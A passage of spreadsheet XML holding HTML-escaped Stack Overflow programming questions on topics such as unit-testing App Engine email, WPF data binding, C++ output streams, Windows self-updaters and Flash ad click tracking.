&lt;p&gt;I have this code that sends an email based on request params after some auth logic. in my Unit tests (i'm using &lt;a href="http://code.google.com/p/gaeunit/" rel="nofollow"&gt;GAEUnit&lt;/a&gt;), how do I confirm an email with specific contents were sent? - i.e. how do I mock the emailer with a fake emailer to verify send was called?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class EmailHandler(webapp.RequestHandler):
 def bad_input(self):
  self.response.set_status(400)
  self.response.headers['Content-Type'] = 'text/plain'
  self.response.out.write("&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;bad input &amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;")
 def get(self):
  to_addr = self.request.get("to")
  subj = self.request.get("subject")
  msg = self.request.get("body")
  if not mail.is_email_valid(to_addr):
    # Return an error message...
    #   self.bad_input()
    pass
  # authenticate here
  message = mail.EmailMessage()
  message.sender = "my.company@gmail.com"
  message.to = to_addr
  message.subject = subj
  message.body = msg
  message.send()
  self.response.headers['Content-Type'] = 'text/plain'
  self.response.out.write("&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;success!&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the unit tests,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import unittest
from webtest import TestApp
from google.appengine.ext import webapp
from email import EmailHandler
class SendingEmails(unittest.TestCase):
  def setUp(self):
    self.application = webapp.WSGIApplication([('/', EmailHandler)], debug=True)
  def test_success(self):
    app = TestApp(self.application)
    response = app.get('http://localhost:8080/send?to=vijay.santhanam@gmail.com&amp;amp;body=blah_blah_blah&amp;amp;subject=mySubject')
    self.assertEqual('200 OK', response.status)
    self.assertTrue('success' in response)
    # somehow, assert email was sent
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can Window application continue to run despite computer going to standby mode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a Windows application using C#.net. This will accept the login details, validate the login and then keep running unattended till the time the computer is on.&lt;/p&gt;
&lt;p&gt;This computer won't do anything else and go to standby mode after a few minutes as per the security policy.&lt;/p&gt;
&lt;p&gt;Is there a way to &lt;strong&gt;configure my application to avoid going to sleep when the computer goes to standby mode&lt;/strong&gt; and keep the app running? I know we can do this by installing this application as a service. However a service cannot print my data without throwing up a print dialog and therefore, I cannot configure the app as a service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regarding Home page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hava a web application. In that i have a link called "Home". When the user clicks the starting page of the web application that is index.jsp should be displayed in the same page. How can i do that. It should work in internet explorer. &lt;/p&gt;
&lt;p&gt;I have the following html page.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;body bgcolor="#FFF8DC"&amp;gt;
&amp;lt;a href="index.jsp" target="parent" &amp;gt;HOME&amp;lt;/a&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it is not working.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Overwrite executable in C:\Program\MyProg on Windows Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like my program to update itself (downloading a new exe and/or some other files from ftp) and I used the recipe in the accepted answer to &lt;a href="http://stackoverflow.com/questions/264788/can-i-update-a-exe-that-is-running-closed"&gt;this question&lt;/a&gt;.
Recap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Rename running program to old-mp.exe&lt;/li&gt;
&lt;li&gt;Download the update as mp.exe directly&lt;/li&gt;
&lt;li&gt;Restart the program&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This works great for windows XP. On vista there is a problem, as the user must run the program as administrator for this to work. Rightclicking and selecting "Run as administrator" might be over my users heads... Does anyone know a way around this? I like the simple update method very much. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to limit RDLC report for one page in a PDF ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a RDLC report and I am displaying it on the Report Viewer Control in my front end application. I am able to view the report perfectly.&lt;/p&gt;
&lt;p&gt;But the problem arises when I try to export the report to a PDF (using the built-in option).&lt;/p&gt;
&lt;p&gt;I print the report in 3 pages whereas my client wants it to be in a single page. I can't figure out the reason for it as in my report viewer I see only one page but in a PDF there are 3 pages.&lt;/p&gt;
&lt;p&gt;Can something be done about it so that I can control the size of the report?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using PowerMock or How much do you let your tests affect your design?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been a fan of EasyMock for many years now, and thanks to SO I came across references to PowerMock and it's ability to mock Constructors and static methods, both of which cause problems when retrofitting tests to a legacy codebase.  &lt;/p&gt;
&lt;p&gt;Obviously one of the huge benefits of unit testing (and TDD) is the way it leads to (forces?) a much cleaner design, and it seems to me that the introduction of PowerMock may detract from that.  I would see this mostly manifesting itself as:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Going back to initialising collaborators rather than injecting them&lt;/li&gt;
&lt;li&gt;Using statics rather than making the method be owned by a collaborator&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In addition to this, something doesn't quite sit right with me about my code being bytecode manipulated for the test.  I can't really give a concrete reason for this, just that it makes me feel a little uneasy as it's just for the test and not for production.&lt;/p&gt;
&lt;p&gt;At my current gig we're really pushing for the unit tests as a way for people to improve their coding practices and it feels like introducing PowerMock into the equation may let people skip that step somewhat and so I'm loathe to start using it.  Having said that, I can really see where making use of it can cut down on the amount of refactoring that needs to be done to &lt;em&gt;start&lt;/em&gt; testing a class.&lt;/p&gt;
&lt;p&gt;I guess my question is, what are peoples experiences of using PowerMock (or any other similar library) for these features, would you make use of them and how much overall do you want your tests influencing your design?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to use If-else if-else over switch statments and vice versa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why you would want to use a switch block over a series &lt;code&gt;if&lt;/code&gt; statements?&lt;/p&gt;
&lt;p&gt;Switch statements seem to do the same thing but take longer to type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I configure WinCE to use wildcard SSL certificates?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our Windows CE 5.0 application has a problem with our wildcard SSL certificate (*.domain.com) - it won't accept it as valid.&lt;/p&gt;
&lt;p&gt;I understand that Windows Mobile 6.0 has support for wildcard certificates (earlier versions don't) and that is built on WinCE 5 which suggests it should be possible to change WinCE 5 to accept wildcard certificates (EDIT - apparently this shows my limited understanding of the environment and isn't a valid presumption!).&lt;/p&gt;
&lt;p&gt;Can anyone suggest how we go about this? The change needs to be programmatic so that we can roll it out to hundreds of existing clients.&lt;/p&gt;
&lt;p&gt;Help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Refresh problems with databinding between Listview and ComboBox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wrestling with a binding problem in WPF/Silverlight. I have a Listview witch is filled by a DataContext form an EF linq query. In the same usercontrol are textboxes. When changing their values, the listview gets refresht and the data is changed in de db bij .SaveChanges. The problem is that if I use a combobox the data is saved but de listview isn't updated.&lt;/p&gt;
&lt;p&gt;Can you be of help????
Here is the xaml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     &amp;lt;ListView Grid.Row="1" Grid.Column="0"  Margin="4,4,4,0" x:Name="controlsListBox" Grid.RowSpan="7" ItemsSource="{Binding}" SelectedValuePath="ID" LostFocus="controlsListBox_LostFocus"&amp;gt;
        &amp;lt;ListView.View&amp;gt;
           &amp;lt;GridView&amp;gt;
              &amp;lt;GridViewColumn Width="25" Header="Rw" DisplayMemberBinding="{Binding RowNr}"/&amp;gt;
              &amp;lt;GridViewColumn Width="25" Header="Cl" DisplayMemberBinding="{Binding ColumnNr}"/&amp;gt;
              &amp;lt;GridViewColumn Width="100" Header="Name" DisplayMemberBinding="{Binding Name}"/&amp;gt;
              &amp;lt;GridViewColumn Width="25" Header="Tb" DisplayMemberBinding="{Binding TabIndex}"/&amp;gt;
              &amp;lt;GridViewColumn Width="100" Header="Type" DisplayMemberBinding="{Binding ControlTypes.Name}"/&amp;gt;
              &amp;lt;GridViewColumn Width="100" Header="Text" DisplayMemberBinding="{Binding TextResources.Text}"/&amp;gt;
           &amp;lt;/GridView&amp;gt;
        &amp;lt;/ListView.View&amp;gt;
     &amp;lt;/ListView&amp;gt;
     &amp;lt;Label Grid.Row="2" Grid.Column="5" Height="23" Margin="4,4,4,0" x:Name="rowSpanLabel" VerticalAlignment="Top"
            Content="RowNr"/&amp;gt;
     &amp;lt;TextBox Grid.Row="2" Grid.Column="6" Height="23" Margin="4,4,4,0" x:Name="rowSpanTextBox" VerticalAlignment="Top" 
              Text="{Binding Path=SelectedItem.RowNr, ElementName=controlsListBox}"/&amp;gt;
     &amp;lt;Label Grid.Row="4" Grid.Column="1" Grid.ColumnSpan="2" Height="23" Margin="4,4,4,0" x:Name="controlTypeLabel" VerticalAlignment="Top"
            Content="Type"/&amp;gt;
     &amp;lt;ComboBox Grid.Row="4" Grid.Column="2" Grid.ColumnSpan="5" Height="23" Margin="4,4,4,0" x:Name="controlTypeComboBox" VerticalAlignment="Top"
               DataContext="{Binding  Path=ControlTypes, ElementName=controlsListBox}" IsSynchronizedWithCurrentItem="True" DisplayMemberPath="Name"
               SelectedItem="{Binding Path=SelectedItem.ControlTypes, ElementName=controlsListBox, Mode=TwoWay, UpdateSourceTrigger=PropertyChanged}" 
               /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And here the C# code:
         _controlProperties.Clear();
         var data = (from x in _dataContext.ControlProperties
                     where x.FormProperties.ID == 1
                     orderby x.RowNr, x.ColumnNr, x.Name
                     select x);
         foreach (var item in data)
         {
            item.TextResourcesReference.Load();
            _controlProperties.Add(item);
         }
         // DataContext must first be set to null for good result.
         controlsListBox.DataContext = null;
         controlsListBox.DataContext = _controlProperties;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     controlTypeComboBox.DataContext = (from c in _dataContext.ControlTypes
                                        orderby c.Name
                                        select c).ToList();
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to programmatically manipulate an EPS file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for libraries that would help in programatically manipulating EPS (Encapsulated PostScript) files. Basically, what I want to do is following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Show / Hide preexisting layers in the EPS file (toggle them on and off)&lt;/li&gt;
&lt;li&gt;Fill (color) named shapes in the EPS file&lt;/li&gt;
&lt;li&gt;Retrieve coordinates of named points in the EPS file&lt;/li&gt;
&lt;li&gt;draw shapes on a new layer in the EPS file&lt;/li&gt;
&lt;li&gt;on a server, without user interaction (scripting Adobe Illustrator won't work)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am aware of how the EPS file format is based on the PostScript language and must therefore be interpreted - for creating simple drawings from scratch this is rather easy. But for actually modifying existing files, I guess you need a library that interprets the file and provides some kind of "DOM" for manipulation.&lt;/p&gt;
&lt;p&gt;Can I even have named shapes and points inside an EPS file?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Assuming I had the layers saved in separate EPS files. Or better still: Just the "data" part of the layers. Could I then concatenate this stuff to create a new EPS file? And append drawing commands? Fill existing named objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Slow refresh on panel scrolling</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an user control that I need for a project, the control have around 13 rows, 7 columns of textboxes, comboboxes... everything on a form autoscrollable.
The problem is that in execution time when scrolling the content refreshing is very very slow.
Some idea?&lt;/p&gt;
&lt;p&gt;Using a datagridview is not an option.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;I should be more specific, the 13 row controls are in the usercontrol.
I have changed the uc's doublebuferred property to true, I can't change the child controls because all them are standard text and comboboxes, so there isn't such property.
In the main form I'm creating around 7 of this usercontrols dynamically inside of an autoscrollable panel, the problem comes scrolling the panel, the refresh is extremely slow.
And yes, I neither can believe that the winforms could be so bad.&lt;/p&gt;
&lt;p&gt;Regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does object reuse work in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently moved from VB6 to VB.NET and I am finally getting there with understanding the inner workings. I've been looking at my company's existing codebase and I am a little suprised. &lt;/p&gt;
&lt;p&gt;I understand that when VB.NET creates a string it see's if the string is in memory and if not creates a new instance of that string, otherwise it points the new variable to the old . However I wonder if it does this with other objects?&lt;/p&gt;
&lt;p&gt;The reason I ask is my new company has a DATABASE object which basically wraps database connection info and database connections in a object.&lt;/p&gt;
&lt;p&gt;We also have a BOOK object and a PAGES object.&lt;/p&gt;
&lt;p&gt;My best practice in VB6 would be to create a DATABASE object and then pass (byRef) that to the BOOK and then PAGES object, so you have one DATABASE object passed to muliple books and then PAGES.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;However&lt;/em&gt;, how they have done it is to create a new instance of the DATABASE object in each PAGE and each PAGE object, which means you could have muliple instances (thousands in fact) of objects which are in fact all the same.&lt;/p&gt;
&lt;p&gt;Is this wise? Or do objects get handled like Strings?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I replicate the trashing animation of Mail.app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my iPhone app, I have put a UIBarBUtton of type UIBarButtonSystemItemTrash in my UIToolBar. When pressed, I'd like to replicate the animation of Mail.app: the bin opens, the UIView folds and flies into it.&lt;br /&gt;
Is there a way to access this animation ithrough the iPhone SDK?  &lt;/p&gt;
&lt;p&gt;Presently I am using a custom made animation, but there are some limits; for example, I cannot animate the bin itself.
Do you have any suggestion? Code samples?&lt;/p&gt;
&lt;p&gt;Cheers,&lt;br /&gt;
Davide&lt;/p&gt;
</t>
  </si>
  <si>
    <t>css : round cornered div on hover</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to accomplish something that seemed quite simple... &lt;/p&gt;
&lt;p&gt;I have 3 divs that contain a radiobutton and some content:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     Content of DIV1,
[]   this can be as long or as tall
     as wanted
[]   Content of DIV2
[]   Content of DIV3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's easy to create rounded corners for each div using any techniques found on &lt;a href="http://stackoverflow.com/questions/7089/what-is-the-best-way-to-create-rounded-corners-using-css"&gt;other posts&lt;/a&gt; here. Yet, I haven't been able to do that only for the hover event, ie I would like to see the rounded box appear around the div only when the mouse hovers over it. Has anyone seen an example of this being done somewhere?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: I'm already using Prototype and Scriptaculous.  I can't add jQuery just for this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select either a file or folder from the same dialog in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an "easy" way to select either a file OR a folder from the same dialog?&lt;/p&gt;
&lt;p&gt;In many apps I create I allow for both files or folders as input.
Until now i always end up creating a switch to toggle between file or folder selection dialogs or stick with drag-and-drop functionality only. &lt;/p&gt;
&lt;p&gt;Since this seems such a basic thing i would imagine this has been created before, but googling does not result in much information. So it looks like i would need to start from scratch and create a custom selection Dialog, but I rather not introduce any problems by reinventing the wheel for such a trivial task.&lt;/p&gt;
&lt;p&gt;Anybody any tips or existing solutions?&lt;/p&gt;
&lt;p&gt;To keep the UI consistent it would be nice if it is possible to extend the OpenFileDialog (or the FolderBrowserDialog).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Performance Point, Dashboard Designer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;I am brand new to this product. Microsoft has some good free videos...but I am looking for a site where I can ask question about 'how to', or post problems..any recommendations?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;(&lt;a href="http://www.microsoft.com/business/performancepoint/resources/training.aspx" rel="nofollow"&gt;http://www.microsoft.com/business/performancepoint/resources/training.aspx&lt;/a&gt;)&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Just in case this is a good site for that...&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I want to bring in a sql table to dashboard designer, and produce a scorecard based on 83 operational metrics across 12 divisions... I have a simple table schema: &lt;/p&gt;
&lt;p&gt;key, metric_ID, value1, value2, value3, value4, value5, CalendarWeek, Year, Entered, Updated)&lt;/p&gt;
&lt;p&gt;I have sql jobs that crawl to multiple databases and write back the base data weekly. The idea is that I would let the dashboard designer produce the actual metric, based on the metric needs. &lt;/p&gt;
&lt;p&gt;eg. for hotline performance closed calls on the first call, over calls received:
 (45, 16, 786, 1345,null,null,null,1,2009, 1/5/2009 6am, null) &lt;/p&gt;
&lt;p&gt;786/1345 = 58% against an operational target of 50% .. so the kpi would be green.&lt;/p&gt;
&lt;p&gt;my problem is;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;when I create a scorecard using the tabluar wizard, I just get a scorecard listing the fields as rows (786, 1345, blank, blank, blank); with Actual and Target as the columns... how do I do the calculation of the metric?..or do I need to expand my sql table to actually DO the math for the metric??...&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I dont quite get the concept of dimensionality yet...the dimensions are the Entered and Updated dates...not quite what I need..i think...&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;soo...how do I structure my sql table to bring in these metrics, and how do I 'dimension' the connector for dashboard designer to do the metric calculation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I hide some content from some users with PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created an intranet for our company using PHP. The same menu appears on every page, and includes links to sensitive pages and documents (like Word files).&lt;/p&gt;
&lt;p&gt;Currently only in-office employees have access to the site, but we'd like to open it up to some out-of-office contractors. The catch is that I'd have to restrict access for certain content.&lt;/p&gt;
&lt;p&gt;I know &lt;a href="http://www.elated.com/articles/password-protecting-your-pages-with-htaccess" rel="nofollow"&gt;how to password-protect site directories with Apache&lt;/a&gt;, but I'd rather hide the menu options themselves.&lt;/p&gt;
&lt;p&gt;How would you approach this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;: This is in an environment where everyone is logged in to our Windows network, locally or via VPN, but currently nobody has to log in to see my intranet site. The ideal solution would not require them to do anything extra, if that's possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Assigning cout to a variable name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In ANSI C++, how can I assign the cout stream to a variable name? What I want to do is, if the user has specified an output file name, I send output there, otherwise, send it to the screen. So something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ofstream outFile;
if (outFileRequested) 
    outFile.open("foo.txt", ios::out);
else
    outFile = cout;  // Will not compile because outFile does not have an 
                     // assignment operator
outFile &amp;lt;&amp;lt; "whatever" &amp;lt;&amp;lt; endl;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried doing this as a Macro function as well:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define OUTPUT outFileRequested?outFile:cout
OUTPUT &amp;lt;&amp;lt; "whatever" &amp;lt;&amp;lt; endl;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that gave me a compiler error as well.&lt;/p&gt;
&lt;p&gt;I supposed I could either use an IF-THEN block for every output, but I'd like to avoid that if I could. Any ideas? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows .Net controls - Creating property templates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume that all text box controls in my .Net Windows application created by dragging a TextBox control onto the Form editor should have the following default properties (some text box instances can override these properties) : &lt;br&gt;&lt;/p&gt;
&lt;p&gt;Text Align: Centre &lt;br/&gt;
Resize : As per content &lt;br/&gt;
Dock: Left, Top and Right&lt;br/&gt;
&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Now, it becomes cumbersome and manually boring task to set these properties every time it is needed. Is there any way by which these properties can be defaulted at an "Assembly level". 
I know that User controls will solve the problem, but that I believe that it is a costly solution, and I think that there should be a simpler and more elegant solution for this problem. 
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio shortcut for showing dropdown of available Enum values for function argument</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When calling an overloaded argument in visual studio, visual studio often doesn't show the dropdown of available enumerated values available for a function argument.  Is there a shortcut one can use the force the dropdown to be displayed, so one doesn't have to type the fully qualified path to the enum declaration?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pass anonymous function by value in javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function that accepts an anonymous function as an argument and sets it to a variable (scoped) for reference.  I then try to execute another function with that reference but it obviously fails since that function is out of scope.&lt;/p&gt;
&lt;p&gt;I was wondering if anyone knew of a simple way of passing the anonymous function straight through as an anonymous function, avoiding the scoping issue?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: To clarify, the el element is defined after the function is isolated from the arguments list.  Additionally, the el element is a part of the arguments list as well.  Were this code to be used by only me, I would likely have used a two argument list with the second argument being an array or hash object but unfortunately this code is going to be used by some folks who are less familiar with JS or even coding for that matter.&lt;/p&gt;
&lt;p&gt;Thanks for the help!&lt;/p&gt;
&lt;p&gt;Here is the relevant portion of my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;locate : function(){
  if ((!arguments)||(!arguments.length)) return;
  arguments = [].splice.call(arguments,0); //This just converts arguments into an array
  for (var i=0;i&amp;lt;arguments.length;i++){
    if (typeof(arguments[i])=='function'){
      var tf = arguments.splice(i,1);
      break;
    };
  };
  if (!tf) return;
  JAS.Globals.eventListen('click',el,tf);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is abbreviated so just trust that el is defined.
JAS.Globals.eventListen is just an intelligent addEventListener.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I hook into the UI rendering "engine" of ASP.NET Dynamic Data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have decorated my model using Metadata classes attached to my model classes via the MetadataType attribute. I have some use the Range attribute, Required attribute, etc. &lt;em&gt;and some custom attributes I have created.&lt;/em&gt; &lt;/p&gt;
&lt;p&gt;Now I want to hook into the rendering engine (or whatever it is called) of the Dynamic Data framework and be able to change the way the UI is rendered based on &lt;em&gt;my custom attributes&lt;/em&gt; as well as the standard System.ComponentModel.DataAnnotations attributes.&lt;/p&gt;
&lt;p&gt;Also, I might want to use ASP.NET MVC, so keep that in mind.&lt;/p&gt;
&lt;p&gt;How do I do that? Pointing me to links would be great if you don't want to be verbose about explaining the nitty-gritty.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the possibly situations that .net Viewstate could stop working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Init
        If Page.IsPostBack Then
            If ViewState("test") IsNot Nothing Then
                Response.Write((ViewState("test").ToString))
            Else 
                Response.Write("Viewstate is empty.")
            End If
        Else
            ViewState("test") = "viewstate is working."
        End If
    End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code doesn't work on a particular page in my application. Viewstate is not turned off in the Page directive. I can't figure out what's going on. : \&lt;/p&gt;
&lt;p&gt;Oh i just figured it out. See if you notice it.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;.&amp;lt;&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Changing the owner of an existing process in Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to start tomcat (Web Server) as a privileged user, and then bring it back to an unprivileged user once it has started.  Is there a way to do this programatically, or in general with Linux?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I return multiple datatables from a SQL Server stored procedured?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to make two queries on two different tables and the data isn't really related. So when I call the stored proc through my code, I should be getting a DataSet with two DataTables, one DataTable for each query. How is that done in SQL Server stored procs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>auto-detecting components using spring annotations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've managed to configure to spring to auto-detect my components using the @Autowire 
annotation.  However the problem is that not all the components are being Auto wired.&lt;br /&gt;
Specifically My DAO's are being bound but my service objects aren't.  I have to explicitly 
create a bean for my service object in the spring xml config file.&lt;/p&gt;
&lt;p&gt;Any clue as to why this is happening?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating absolute URLs from Seam emails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to coax either the &lt;code&gt;h:outputLink&lt;/code&gt; or &lt;code&gt;s:link&lt;/code&gt; tags into generating absolute URLs?  In a Seam email message, I want to be able to do something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;s:link view="/someView.xhtml"&amp;gt;
    &amp;lt;f:param name="a" value="#{a.nastyParam}" /&amp;gt;
    &amp;lt;f:param name="b" value="#{b.nastyParam}" /&amp;gt;
    &amp;lt;h:outputText value="Come do something awesome!" /&amp;gt;
&amp;lt;/s:link&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and generate an absolute URL without the fuss of messing with URL encoding, prepending the protocol, host, context path, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF: Best way to raise a popup window that is modal to the page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a WPF app using navigation style pages and not windows. 
I want to show a window inside a page, this window must be modal to the page, but allow the user to go to other page, and go back to the same page with the modal window in the same state.&lt;/p&gt;
&lt;p&gt;I have tried with the WPF popup control but the problem is that the control hides everytime you navigate away from the page. I guess that I can write the code to show it again, but does not seams the right way.&lt;/p&gt;
&lt;p&gt;What is the best way to do this in WPF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to implement C#'s BackgroundWorker in Delphi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use C#'s &lt;a href="http://msdn.microsoft.com/en-us/library/system.componentmodel.backgroundworker.aspx" rel="nofollow" title="BackgroundWorker"&gt;BackgroundWorker&lt;/a&gt; object frequently to start a thread and perform a task.  What's the easiest way to accomplish the same thing in Delphi?&lt;/p&gt;
&lt;p&gt;Here's some code in C#:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void button1_Click(object sender, EventArgs e)
{
  BackgroundWorker bg = new BackgroundWorker();
  bg.DoWork += new DoWorkEventHandler(bg_DoWork);
  bg.RunWorkerCompleted += new RunWorkerCompletedEventHandler(bg_RunWorkerCompleted);
  test_number++;
  object[] arguments = { "test", test_number };
  bg.RunWorkerAsync(arguments);
}
void bg_RunWorkerCompleted(object sender, RunWorkerCompletedEventArgs e)
{
      // done.
}
void bg_DoWork(object sender, DoWorkEventArgs e)
{
     // do actual work here
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I create a workspace window for other windows using c# in visual studio 2008?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to create a workspace with status bar and menu, and within this workspace container have smaller windows of various types. &lt;/p&gt;
&lt;p&gt;For example, if you un-maximise a worksheet in Excel but not the main window, it becomes a window in a larger workspace.&lt;/p&gt;
&lt;p&gt;I've tried searching for the result but the main problem is in knowing the right terminology.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tracking Clicks on a Flash Ad</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When a site has third party flash ads, is it possible for the site to track clicks to the flash? As the flash files are not created by the site, they cannot be changed. But the site wants to confirm the click-through counts that the ad agency is reporting with its own click tracking.&lt;/p&gt;
&lt;p&gt;JavaScript onclick (or other mouse events) attached to the object or embed tags do not work.&lt;/p&gt;
&lt;p&gt;What I have tried most recently is to place a floating invisible div over the flash and attaching the click event to that.  However this does not function well in IE.&lt;/p&gt;
&lt;p&gt;An alternative I am thinking of is to use my own Flash loader SWF. The new SWF would load the ad SWF file as a movie it displays. Then whenever a click happens the loader flash would trigger my click tracking JS, and then allow the click event to continue on to the ad flash. Does that sound possible/feasible?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Addendum:&lt;/strong&gt; I have two questions about the loader method:&lt;br /&gt;
1) Can a flash from domain example.com load a swf file from ads.mordor.com?&lt;br /&gt;
2) Can a swf loaded within another swf both get click events?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a GIS "Hello World" Equivalent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there the equivalent of the "Hello World" program for GIS applications?&lt;/p&gt;
&lt;p&gt;I am looking to become more familiar with the development of GIS applications.  What are the popular (and free/low cost) tutorials and/or sample applications that would help someone get started?  Are there any books that you would consider essential for beginner GIS developers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using XmlSerializer with private and public const properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the simplest way to get XmlSerializer to also serialize private and "public const" properties of a class or struct?  Right not all it will output for me is things that are only public.  Making it private or adding const is causing the values to not be serialized.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Array posting in PHP</t>
  </si>
  <si>
